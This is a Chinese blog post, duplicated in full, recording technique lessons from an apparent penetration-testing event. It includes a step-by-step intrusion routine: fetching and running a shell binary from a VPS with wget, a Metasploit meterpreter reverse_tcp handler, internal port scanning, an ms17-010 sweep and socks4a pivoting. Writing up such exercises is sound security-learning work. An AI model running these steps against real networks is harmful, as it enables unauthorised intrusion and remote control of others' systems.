某活动技术点总结
2017-12-04 22:53
211 查看
因为特殊原因,所以只记录心得技术点,看不懂就别看了。
情报就是一切。
这句话真的是让我觉得汗颜无比啊。
开场别人已经拿shell了,我还摸不着北。nmap没毛病,结果别人jboss拿的shell。
这个地方记住,关键IP要-p-,扫描全端口,不能放过。
弱口令要检查上传点,上传点要多发掘,如果一个不能绕过就要去尝试另外的,把链接都点一下,万一就有隐藏的上传点。
x站其实难度都不大,就是看谁信息收集比较全面,谁比较细心罢了。
站群当我没说,恶心不死人,但是说不定旁站有惊喜。
另外Oracle可以getshell,参见下一篇博文。
谁说老的洞就没用,心脏滴血说不定就能起奇效。
第一次真正意义的进了内网,要记得sock4a模块可以开个sock代理转发出来,接收可以用proxyfilter。
进内网有很大可能nmap不能扫,网络好的情况下可以用msf的portscan,注意要用tcp,如果是syn扫描要root权限。
nmap扫不了有可能因为你nmap有问题,但最大可能是IDC机房封了namp,国内内网最好用国内VPS(所以要授权)。
看情况,没时间就直接ms17-010扫一遍B段,看运气咯。
时间充足就sock4a转出来,普通测试套路来一套咯。虽然很多时候都是弱口令巴拉巴拉。
才出来的大洞来一套,基本都会有中招的。反正就是老套路。
最后加上一个一条龙进内网的套路。
首先获取一个shell,045、上传之类的:
1.wget一个vps上的shell
2.chmod 777 shell.elf
3. ./shell.elf &
4.进msfconsole,开启handler监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST xxxxxx
set LPORT xxxx
exploit -j
5.成功获取会话之后,进shell之后是exit来退出,meterpreter是background,扫描前记得添加路由表
0/24是C段,0/16是B段
6.端口扫描除了nmap还有msf自带的
use auxiliary/scanner/portscan/syn
set PORTS 80,8080,6379,7001,8080,8009
set RHOSTS xxxxxx
set THERADS 10
exploit
端口就设置点常用的就行了,网络状态不好就线程开低点。
7.sock4a代理
use auxiliary/server/socks4a
exploit -y
让他后台慢慢运行就好了,本地用proxyfilter接,52有破解。
大概就是这样,这次收获颇多,很多理论上的东西得到了验证。
情报就是一切。
这句话真的是让我觉得汗颜无比啊。
开场别人已经拿shell了,我还摸不着北。nmap没毛病,结果别人jboss拿的shell。
这个地方记住,关键IP要-p-,扫描全端口,不能放过。
弱口令要检查上传点,上传点要多发掘,如果一个不能绕过就要去尝试另外的,把链接都点一下,万一就有隐藏的上传点。
x站其实难度都不大,就是看谁信息收集比较全面,谁比较细心罢了。
站群当我没说,恶心不死人,但是说不定旁站有惊喜。
另外Oracle可以getshell,参见下一篇博文。
谁说老的洞就没用,心脏滴血说不定就能起奇效。
第一次真正意义的进了内网,要记得sock4a模块可以开个sock代理转发出来,接收可以用proxyfilter。
进内网有很大可能nmap不能扫,网络好的情况下可以用msf的portscan,注意要用tcp,如果是syn扫描要root权限。
nmap扫不了有可能因为你nmap有问题,但最大可能是IDC机房封了namp,国内内网最好用国内VPS(所以要授权)。
看情况,没时间就直接ms17-010扫一遍B段,看运气咯。
时间充足就sock4a转出来,普通测试套路来一套咯。虽然很多时候都是弱口令巴拉巴拉。
才出来的大洞来一套,基本都会有中招的。反正就是老套路。
最后加上一个一条龙进内网的套路。
首先获取一个shell,045、上传之类的:
1.wget一个vps上的shell
2.chmod 777 shell.elf
3. ./shell.elf &
4.进msfconsole,开启handler监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST xxxxxx
set LPORT xxxx
exploit -j
5.成功获取会话之后,进shell之后是exit来退出,meterpreter是background,扫描前记得添加路由表
0/24是C段,0/16是B段
6.端口扫描除了nmap还有msf自带的
use auxiliary/scanner/portscan/syn
set PORTS 80,8080,6379,7001,8080,8009
set RHOSTS xxxxxx
set THERADS 10
exploit
端口就设置点常用的就行了,网络状态不好就线程开低点。
7.sock4a代理
use auxiliary/server/socks4a
exploit -y
让他后台慢慢运行就好了,本地用proxyfilter接,52有破解。
大概就是这样,这次收获颇多,很多理论上的东西得到了验证。
相关文章推荐
- 广州技术沙龙第 3 期活动总结
- 广州技术沙龙第 3 期活动总结
- Android项目技术总结:获取状态栏和标题栏并计算长宽来限制绘制浮动窗口活动范围
- 双十一活动开发技术总结
- Android项目技术总结:获取状态栏和标题栏并计算长宽来限制绘制浮动窗口活动范围
- 2014年11月2日户外技术讨论活动(主题:android)总结
- ACMUG第三次技术沙龙北京站·6月18活动总结(附ppt下载链接)
- 博客园北京俱乐部第三次技术活动(2009/5/23)总结
- 2014年9月6日户外技术讨论活动(大佛头)总结
- 2014年8月16日户外技术讨论小活动(爬山)总结
- 博客园北京俱乐部第二次技术活动(2009/4/4)总结
- 第一期广州技术沙龙活动总结
- 2014年9月21日户外技术讨论活动(主题:swift)总结
- 广州技术沙龙第二期活动总结
- Android项目技术总结:获取状态栏和标题栏并计算长宽来限制绘制浮动窗口活动范围
- 广州技术沙龙第二期活动总结
- 广州技术沙龙第二期活动总结
- 广州技术沙龙第二期活动总结
- 20140112技术分享活动总结
- 博客园北京俱乐部第三次技术活动(2009/5/23)总结